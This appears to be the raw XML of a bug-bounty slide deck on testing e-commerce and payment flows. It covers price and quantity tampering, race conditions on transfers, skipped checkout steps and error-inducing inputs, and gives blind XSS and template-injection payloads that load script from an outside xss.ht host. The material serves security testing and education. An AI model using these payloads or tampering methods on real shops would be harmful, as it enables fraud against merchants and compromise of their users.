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Lato"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
      <p:italic r:id="rId26"/>
      <p:boldItalic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId28"/>
      <p:bold r:id="rId29"/>
      <p:italic r:id="rId30"/>
      <p:boldItalic r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular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La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SourceCodePro-regular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5.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack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swa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240823d2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240823d2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2987761b0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2987761b0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2987761b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b2987761b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2987761b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2987761b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b2987761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b2987761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a93424c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a93424c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a93424c4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a93424c4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b2987761b0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b2987761b0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b240823d22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b240823d22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a93424c40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a93424c40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a93424c4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a93424c4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a93424c40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a93424c40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9750820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9750820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97508209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97508209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97508209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9750820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2987761b0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2987761b0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2987761b0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2987761b0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99007" y="-20954"/>
            <a:ext cx="7746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909319" y="-20954"/>
            <a:ext cx="73254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57200" y="1202246"/>
            <a:ext cx="82296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7165205" y="5009234"/>
            <a:ext cx="1678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OBJECT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OBJECT_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OBJECT_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6">
  <p:cSld name="OBJECT_6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7">
  <p:cSld name="OBJECT_7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8">
  <p:cSld name="OBJECT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5" name="Google Shape;165;p3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4487417" y="390906"/>
            <a:ext cx="169200" cy="8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9" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0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0" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028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1" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853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2" name="Google Shape;172;p36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251022" y="925449"/>
            <a:ext cx="37161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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709160" y="1183005"/>
            <a:ext cx="39774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6" name="Google Shape;176;p3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3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9">
  <p:cSld name="OBJECT_9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3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BJECT_10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526541" y="2795835"/>
            <a:ext cx="80910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3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7" name="Google Shape;187;p3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8" name="Google Shape;188;p3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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="77664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39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3" name="Google Shape;193;p3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hyperlink" Target="https://twitter.com/0xAwali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hyperlink" Target="https://2018.zeronights.ru/wp-content/uploads/materials/2%20ZN2018%20WV%20-%20Blind%20Xss%20%28femida%20plugin%29.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1323614674143846403" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/intigriti/status/1185160357872066561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hyperlink" Target="https://twitter.com/intigriti/status/1187349143678836737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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf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s://hackerone.com/reports/759247" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://twitter.com/intigriti/status/1192427497243185152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twitter.com/0xAwali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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://hackerone.com/reports/364843" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/403783" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/771694" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://hackerone.com/reports/927661" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/422331" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/sunilyedla2/status/133874648541697228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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf" TargetMode="External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hyperlink" Target="https://darkweblinks.org/2018/08/10/xxe-for-fun-and-profit-converting-json-request-to-xml/" TargetMode="External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hyperlink" Target="https://twitter.com/NahamSec/status/1162060338696613889" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/411690" TargetMode="External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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="508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0" name="Google Shape;200;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="87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1" name="Google Shape;201;p40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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150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3" name="Google Shape;20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1200" y="4110576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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678175" y="2159275"/>
            <a:ext cx="3916500" cy="1255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/>
              <a:t>Shopping Cart                </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Price</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="600"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="600"/>
              <a:t>                    </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="300"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="300"/>
              <a:t>                                                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>Something</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600"/>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="600"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="600"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="600"/>
            </a:br>
            <a:endParaRPr b="1" sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="16666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434343"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Total :    3 * $</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="53502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b="1" lang="en" sz="55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Online</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="72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lang="en" sz="55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Shopping</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="55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6" name="Google Shape;206;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4839425" y="2564550"/>
            <a:ext cx="2527800" cy="14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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695875" y="2847225"/>
            <a:ext cx="727500" cy="1290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952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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Seller</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695875" y="3021125"/>
            <a:ext cx="523800" cy="993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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quantity 3</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4839425" y="3165325"/>
            <a:ext cx="2527800" cy="14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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704475" y="2382550"/>
            <a:ext cx="774900" cy="1752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Buying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211" name="Google Shape;211;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704475" y="2699425"/>
            <a:ext cx="774900" cy="1752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Change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212" name="Google Shape;212;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704475" y="3016300"/>
            <a:ext cx="774900" cy="1752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Delete</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213" name="Google Shape;213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88575" y="2629250"/>
            <a:ext cx="7749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0" name="Google Shape;330;p4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32" name="Google Shape;332;p4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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Blind Template Injection Payloads e.g. {{constructor.constructor</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('import("http://me.xss.ht")')()}} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In User-Agent OR Noun-Standard Headers e.g. X-Forwarded-For</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="333" name="Google Shape;3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/buying-something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r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;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Quantity=1&amp;price=10&amp;currency=dollar&amp;token=************&amp;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add=egy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335" name="Google Shape;335;p4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36" name="Google Shape;33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75" y="2676500"/>
            <a:ext cx="462101" cy="365098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9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38" name="Google Shape;338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4" name="Google Shape;344;p5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46" name="Google Shape;346;p5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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invisible Range %00 To %FF </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All Field Values Of Parameters e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quantity=%00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Quantity=%FF </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Cause Errors Exposing Sensitive Information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47" name="Google Shape;34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49" name="Google Shape;34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8575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56" name="Google Shape;356;p5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58" name="Google Shape;358;p5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Insert Large Characters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Numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All Field Values Of Parameters e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quantity=XXX 50.000+ XXX </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Cause Errors Exposing Sensitive Information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59" name="Google Shape;35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61" name="Google Shape;361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3150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8" name="Google Shape;368;p5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70" name="Google Shape;370;p5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Manipulate The Response </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Cause Errors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71" name="Google Shape;37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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 OK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Access-Control-Allow-Origin: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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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{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	"price" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.10</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,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	"q</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uantity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" : 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}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373" name="Google Shape;373;p5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74" name="Google Shape;374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596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80" name="Google Shape;380;p5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82" name="Google Shape;382;p5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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transferring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Money From Bank Account One To Bank Account Two</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. http://comapny.com/transfer?from=1&amp;to=2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;amount=10</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To Use Race Condition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383" name="Google Shape;38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While Sending Money </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From e.g. 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  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://comapny.com/transfer?from=1&amp;to=2&amp;amount=10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Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Request And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send It To Turbo Intruder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 Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Race File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Do Race Condition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385" name="Google Shape;385;p5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86" name="Google Shape;386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596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3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88" name="Google Shape;388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4" name="Google Shape;394;p5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96" name="Google Shape;396;p5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Applications That Allow Users To Change Their Order While Paying For An Item Can Also Be Vulnerable When There Is No Verification At The End Of The Process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97" name="Google Shape;39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1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From Firefox Browser , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Item To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basket</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Go 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     Through Payment Page Then Stop Here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Open </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then Add An New Items To Basket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 From FireFox , Complete The Payment </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process To 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      Get Free Items </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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399" name="Google Shape;399;p5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00" name="Google Shape;400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596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06" name="Google Shape;406;p5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08" name="Google Shape;408;p5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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skip Some Steps While Buying Something e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> You Have Something Like</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /order/123/shipping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Try To Go Through /order/123/confirm </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directly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09" name="Google Shape;40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11" name="Google Shape;411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8800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6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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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b="1" sz="96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19" name="Google Shape;419;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775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420" name="Google Shape;42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50" y="4049201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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603265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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834570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9" name="Google Shape;219;p4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21" name="Google Shape;221;p4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Manipulate The Quantity e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Original Quantity Is 1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Try To Change It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To 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two Items Free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22" name="Google Shape;2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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;price=10&amp;currency=dollar&amp;token=************&amp;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add=egy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24" name="Google Shape;224;p4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25" name="Google Shape;22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596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1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27" name="Google Shape;227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1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29" name="Google Shape;229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44600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4025" y="39399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1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7" name="Google Shape;237;p4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39" name="Google Shape;239;p4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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulate The Price e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Original Price Is 10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Try To Change It To -10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OR To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fraction Value e.g. 0.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Item Cheaper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0" name="Google Shape;2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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1&amp;price=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;currency=dollar&amp;token=************&amp;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add=egy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42" name="Google Shape;242;p4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3" name="Google Shape;24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596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5" name="Google Shape;245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2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7" name="Google Shape;247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44600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2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9" name="Google Shape;249;p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2925" y="396087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5" name="Google Shape;255;p4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Manipulate The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Currency</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
